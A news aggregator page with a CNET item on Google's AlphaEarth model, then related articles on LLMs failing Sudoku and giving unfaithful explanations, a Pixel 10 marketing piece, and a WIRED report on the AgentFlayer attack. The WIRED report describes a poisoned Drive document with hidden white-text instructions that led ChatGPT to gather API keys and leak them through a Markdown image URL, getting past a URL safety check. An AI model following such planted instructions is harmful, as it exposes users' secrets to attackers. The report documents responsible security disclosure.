
Google AI Model Helps Us See the Planet as We Never Have Before
With all this data, scientists and researchers can monitor problems like water scarcity, deforestation and crop health, among others.
Google says AlphaEarth's AI modeling has already been helpful. "Our partners are already seeing significant benefits, using the data to better classify unmapped ecosystems, understand agricultural and environmental changes, and greatly increase the accuracy and speed of their mapping work," the Google DeepMind blog said Wednesday.
Satellites deliver a treasure trove of data every day, but all this information varies in its modalities -- such as satellite, radar, simulations and laser mapping -- and how current it is. AlphaEarth can integrate all that data and "weaves all this information together to analyze the world's land and coastal waters in sharp, 10x10 meter squares."
AlphaEarth also creates summaries for each of these squares that "require 16 times less storage space than those produced by other AI systems that we tested and dramatically reduces the cost of planetary-scale analysis," Google said. Scientists "no longer have to rely on a single satellite passing overhead."
Hashtags

Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles


CNET
20 minutes ago
- CNET
AI Sucks at Sudoku. Much More Troubling Is That It Can't Explain Why
Chatbots can be genuinely impressive when you watch them do things they're good at, like writing realistic-sounding text or creating weird futuristic-looking images. But try to ask generative AI to solve one of those puzzles you find in the back of a newspaper, and things can quickly go off the rails. That's what researchers at the University of Colorado Boulder found when they challenged different large language models to solve Sudoku. And not even the standard 9x9 puzzles. An easier 6x6 puzzle was often beyond the capabilities of an LLM without outside help (in this case, specific puzzle-solving tools). The more important finding came when the models were asked to show their work. For the most part, they couldn't. Sometimes they lied. Sometimes they explained things in ways that made no sense. Sometimes they hallucinated and started talking about the weather. If gen AI tools can't explain their decisions accurately or transparently, that should cause us to be cautious as we give these things more and more control over our lives and decisions, said Ashutosh Trivedi, a computer science professor at the University of Colorado at Boulder and one of the authors of the paper published in July in the Findings of the Association for Computational Linguistics. "We would really like those explanations to be transparent and be reflective of why AI made that decision, and not AI trying to manipulate the human by providing an explanation that a human might like," Trivedi said. When you make a decision, you can at least try to justify it or explain how you arrived at it. That's a foundational component of society. We are held accountable for the decisions we make. An AI model may not be able to accurately or transparently explain itself. Would you trust it? Why LLMs struggle with Sudoku We've seen AI models fail at basic games and puzzles before. OpenAI's ChatGPT (among others) has been totally crushed at chess by the computer opponent in a 1979 Atari game. A recent research paper from Apple found that models can struggle with other puzzles, like the Tower of Hanoi. It has to do with the way LLMs work and fill in gaps in information. These models try to complete those gaps based on what happens in similar cases in their training data or other things they've seen in the past. With a Sudoku, the question is one of logic. The AI might try to fill each gap in order, based on what seems like a reasonable answer, but to solve it properly, it instead has to look at the entire picture and find a logical order that changes from puzzle to puzzle. Read more: AI Essentials: 29 Ways You Can Make Gen AI Work for You, According to Our Experts Chatbots are bad at chess for a similar reason. They find logical next moves but don't necessarily think three, four or five moves ahead. That's the fundamental skill needed to play chess well. Chatbots also sometimes tend to move chess pieces in ways that don't really follow the rules or put pieces in meaningless jeopardy. You might expect LLMs to be able to solve Sudoku because they're computers and the puzzle consists of numbers, but the puzzles themselves are not really mathematical; they're symbolic. "Sudoku is famous for being a puzzle with numbers that could be done with anything that is not numbers," said Fabio Somenzi, a professor at CU and one of the research paper's authors. I used a sample prompt from the researchers' paper and gave it to ChatGPT. The tool showed its work, and repeatedly told me it had the answer before showing a puzzle that didn't work, then going back and correcting it. It was like the bot was turning in a presentation that kept getting last-second edits: This is the final answer. No, actually, never mind, this is the final answer. It got the answer eventually, through trial and error. But trial and error isn't a practical way for a person to solve a Sudoku in the newspaper. That's way too much erasing and ruins the fun. AI and robots can be good at games if they're built to play them, but general-purpose tools like large language models can struggle with logic puzzles. Ore Huiying/Bloomberg via Getty Images AI struggles to show its work The Colorado researchers didn't just want to see if the bots could solve puzzles. They asked for explanations of how the bots worked through them. Things did not go well. Testing OpenAI's o1-preview reasoning model, the researchers saw that the explanations -- even for correctly solved puzzles -- didn't accurately explain or justify their moves and got basic terms wrong. "One thing they're good at is providing explanations that seem reasonable," said Maria Pacheco, an assistant professor of computer science at CU. "They align to humans, so they learn to speak like we like it, but whether they're faithful to what the actual steps need to be to solve the thing is where we're struggling a little bit." Sometimes, the explanations were completely irrelevant. Since the paper's work was finished, the researchers have continued to test new models released. Somenzi said that when he and Trivedi were running OpenAI's o4 reasoning model through the same tests, at one point, it seemed to give up entirely. "The next question that we asked, the answer was the weather forecast for Denver," he said. (Disclosure: Ziff Davis, CNET's parent company, in April filed a lawsuit against OpenAI, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.) Explaining yourself is an important skill When you solve a puzzle, you're almost certainly able to walk someone else through your thinking. The fact that these LLMs failed so spectacularly at that basic job isn't a trivial problem. With AI companies constantly talking about "AI agents" that can take actions on your behalf, being able to explain yourself is essential. Consider the types of jobs being given to AI now, or planned for in the near future: driving, doing taxes, deciding business strategies and translating important documents. Imagine what would happen if you, a person, did one of those things and something went wrong. "When humans have to put their face in front of their decisions, they better be able to explain what led to that decision," Somenzi said. It isn't just a matter of getting a reasonable-sounding answer. It needs to be accurate. One day, an AI's explanation of itself might have to hold up in court, but how can its testimony be taken seriously if it's known to lie? You wouldn't trust a person who failed to explain themselves, and you also wouldn't trust someone you found was saying what you wanted to hear instead of the truth. "Having an explanation is very close to manipulation if it is done for the wrong reason," Trivedi said. "We have to be very careful with respect to the transparency of these explanations."


Forbes
21 minutes ago
- Forbes
Google Confirms Pixel 10 Pro Details With Attack On Rivals
With a simple caption of 'Google Pixel 10: Soon', the competitive tension ahead of August's 'Made By Google' launch event has been elevated. In addition, Google has also leaned into the competition to highlight why customers might be better off buying the upcoming Pixel 10 and Pixel 10 Pro smartphones: The Pixel 10 Pro Challenge To paraphrase Wikipedia: Diss Track; a song whose primary purpose is to verbally attack someone else, usually another artist. Diss tracks are often the result of an existing, escalating feud between the two people. It's hard not to think that Google's latest teaser video of the Pixel 10 family doesn't fall under this classic definition. While it holds short of naming the 'new phone with a feature coming soon, that has been coming soon for a full year', there's no manufacturer other than Apple, no other smartphone other than the iPhone, that this could apply to. Rather than who, the more interesting question is perhaps why, and why now? The Pixel 10 Pro Builds on Today's Strength One reason may be the current state of the smartphone market. The Android platform, no matter the manufacturer, is significantly ahead of iOS and the iPhone. Artificial Intelligence can be found in numerous digital assistants; some are voice-based, others are on-device clients that help sift through information to offer better feedback and present options. These are all heavily promoted and have unlocked many new features across all ranges. Pixel is no different, although it does have some advantages in being able to tap directly into Google's AI services. It also pushes the other side of the OS coin. The competition, Apple, is not delivering the same experience as Android. The buzz around artificial intelligence is not going away, and if all of that buzz can be focused on your own product and not the competition, that's going to be a benefit both in the short and the long term. The Competition Is Behind The Pixel 10 Pro Tim Cook's Apple is fully aware of this. With previous technological leaps, the perception that Apple is late to the market but comes in with the right solution has been a strong market force in both the allure of Apple and framing its hardware at the apex. This has not been the case with AI. The awkwardly backronymed Apple Intelligence will always be on the back foot when compared to Google's approach due to a higher reliance of on-device processing and reducing a user's digital footprint outside of their smartphone. That's a technical answer, and one that is relatively clear-cut with the geekerati, but it's not as simple a sell to the general consumers. They see an Apple product that does not match the competition… and those who haven't yet made the connection now have this latest video to nudge them towards Google's framing of AI, rather than Apple. Extending AI With Pixel 10 Pro Google is setting the ground for its upcoming expansion of mobile artificial intelligence. Android 16 brings a raft of new features and will make its debut on the competitively priced Pixel 10 and Pixel 10 Pro smartphones… phones that Google has once again confirmed it will be launching on Aug. 20. Not only will the Pixel 10 family show off the new version of Android to the public, but it will also bring with it Google's own first-party apps and services that are unique to Google. These will, as in previous years, offer significant support to users through AI. Waiting For The Pixel 10 Pro In this latest video, Google has stated it is in the lead with AI, its competition has failed to deliver, and it is ready to provide more AI with the new Pixel 10 and Pixel 10 Pro smartphones. Now to see how it delivers on those claims at the end of the month. Read the latest Pixel 10 Pro decisions made by Google…


WIRED
an hour ago
- WIRED
A Single Poisoned Document Could Leak ‘Secret' Data Via ChatGPT
Aug 6, 2025 7:30 PM Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction. Photo-Illustration:The latest generative AI models are not just stand-alone text-generating chatbots—instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused—and researchers have shown it can take just a single 'poisoned' document to do so. New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account. The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and potentially multiplies the ways where vulnerabilities may be introduced. 'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says. OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors. The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.' Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once—full documents could not be removed as part of the attack. 'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures. Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read. In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized. The prompt says the person is actually a 'developer racing against a deadline' and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt. That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account. Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called 'url_safe' to detect if URLs were malicious and stop image rendering if they are dangerous. To get around this, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work, that the researchers used URLs from Microsoft's Azure Blob cloud storage. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes. The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, activating a smart home's lights and boiler remotely. While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also allow malicious hackers a way into an organization's other systems. Bargury says that hooking up LLMs to external data sources means they will be more capable and increase their utility, but that comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.